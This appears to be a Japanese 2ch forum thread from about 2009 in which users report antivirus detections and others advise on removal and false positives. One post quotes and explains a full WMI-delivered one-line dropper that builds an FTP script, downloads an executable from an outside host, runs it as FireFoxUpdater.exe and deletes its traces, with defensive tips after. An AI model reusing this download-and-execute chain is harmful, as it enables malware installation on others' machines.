問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
avastスレにお帰りください
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1321330513 ↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
ttp://pc11.2ch.net/test/read.cgi/sec/1228471265/
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_LOLYDA.AE&VSect=Sn 【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
ttp://ime.nu/drweb.jp/support/cureit.html インストール不要
システムの復元を無効にする
ttp://www.mcafee.com/Japan/mcafee/support/faq/answer_f_other.asp?wk=OT-00019 フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
ありがとうございました。
ありがとうございます。
試してみます。
けっこうおもしろかった
ttp://ime.nu/www.interbars.co.jp/blog/archives/cat_2008_.html rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
同意
いかにrootkitがやっかいなモノかが分かる
本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
ttp://ime.nu/www.microsoft.com/japan/security/incident/sasser_xp.mspx ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
ttp://ime.nu/www.microsoft.com/downloads/details.aspx?familyid=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=ja 一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
俺たちはエスパーではない
FWを無効にするものもあるんですか・・・
この機会に何か入れたいと思います
パソコンが強制的に再起動させられたりしますか?
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
【感染する疑いのあるサイト⇒】
ttp://www.comsn.c o m 行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
アグスによる調査結果(事業閉鎖の案内は確認できる)
ttp://www.aguse.jp/?m=w&url=124.146.222.167&x=35&y=2 該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
ttp://www.virustotal.com/jp/analisis/6d6eb4129e5ed458e7588b0a8c92a001 検出された、トロイの木馬の説明(以下説明の新種と思われる)
ttp://www.f-secure.co.jp/v-descs/v-descs3/JS-Agent-D-jp.htm サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
ご対応ありがとうございます。
しかし宣伝するわけではないけどアンチウィルスソフト
(Win Live OneCare)が検出してくれて助かった。
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
ttp://pc11.2ch.net/test/read.cgi/sec/1216540253/
ttp://pc11.2ch.net/test/read.cgi/sec/1162464139/
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
ttp://www.virustotal.com/jp/ システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
サイズは
574,976 バイト
ディスク上のサイズは
574,536 バイト
ってなってました
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
ttp://ime.nu/www.e-kuraberu.net/uploader/src/kuraberu7608.jpg.html 複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
ttp://dropfile.freehostia.com/house/house.html バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
よくわかりました、ありがとうございました
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
てかマルチ市ね。
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
やばいですかね?;
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1〜3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
自分もウイルスバスターで同じものでました。
一週間前にスキャンして終了してから初起動した時に検出されたんで誤検知を疑ってます。
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
SafeModeで見えますとかまれによくある
どっちだよw
とりあえず、はルートキットスキャナを使ってみた方がいいな。
それ私も検知されました。
一週間前に検索したところ、反応なかったのですが…
今は隔離させています。
てか、セキュリティダッシュボード上では検知されてないのですよね。
うちもそれでたよ
前に検索した時は検出されなかったんだけど
今はと同じで隔離中です
隔離する前に、シマンテックのオンラインスキャンかけたら、検出はされなかったです
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
ttp://www.precisesecurity.com/blogs/2009/01/11/stabilityinternetscancom/ ttp://www.precisesecurity.com/blogs/2008/12/23/system-security/ 「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
exeをダウンロードして実行していなければ問題なし
ありがとうございます、安心しました。
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
マジレスするとJavaScript関係、キャッシュを消せば解決
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
やっぱ有名なウイルスなんでしょうか?
蜘蛛のアニメが画面上に出てくるって
超冷や汗ものですよ
リカバリってことですよね
ありがとうございました
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
つ
ttp://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=exe.a_a&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja つ
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_FIRU.BG&VSect=T どうもありがとうございます。
ファイル名でなく、拡張子で検索すればよかったんですね・・・
私のPCでも検出されましたので、トレンドマイクロに連絡しました。
今日メールで、「誤検出であったため最新のパターンファイルで対応した」との回答があり、
検索したら出なくなりました。
320と同じやつだな。DITだから誤検出か未知のウィルスか迷っていたが・・
結局気分悪いんで消しちまった。結構な数の人が検出されてたらしい
〔午後のこ〜だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_VB.CII&VSect=T 最近流行りのUSBメモリなどを介して感染するウイルス。
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細
まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)
FireFoxUpdater.exeという名前のウィルスなのですか?
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。
PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。
今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。
オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。
長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。
【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
3PC版なら結構いろんな所から出てると思うが
F-Secure、ノートン、OneCare 等々
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
ttp://pc11.2ch.net/test/read.cgi/sec/1231757789
ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。
あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
ttp://ime.nu/www7a.biglobe.ne.jp/~dokyo/newpage74.html ↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて
コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。
という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
ちょっとはググれ
ttp://ime.nu/www.google.co.jp/search?hl=ja&q=W32.Aliz.Worm そんなサイトどうせ詐欺サイトなんじゃねーの
誤爆乙
それ、いたずらサイト。
感染しないの問題ない。放置でOK
STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略
といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
ttp://www.atmarkit.co.jp/fsecurity/rensai/securitytips/010messenger.html ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」
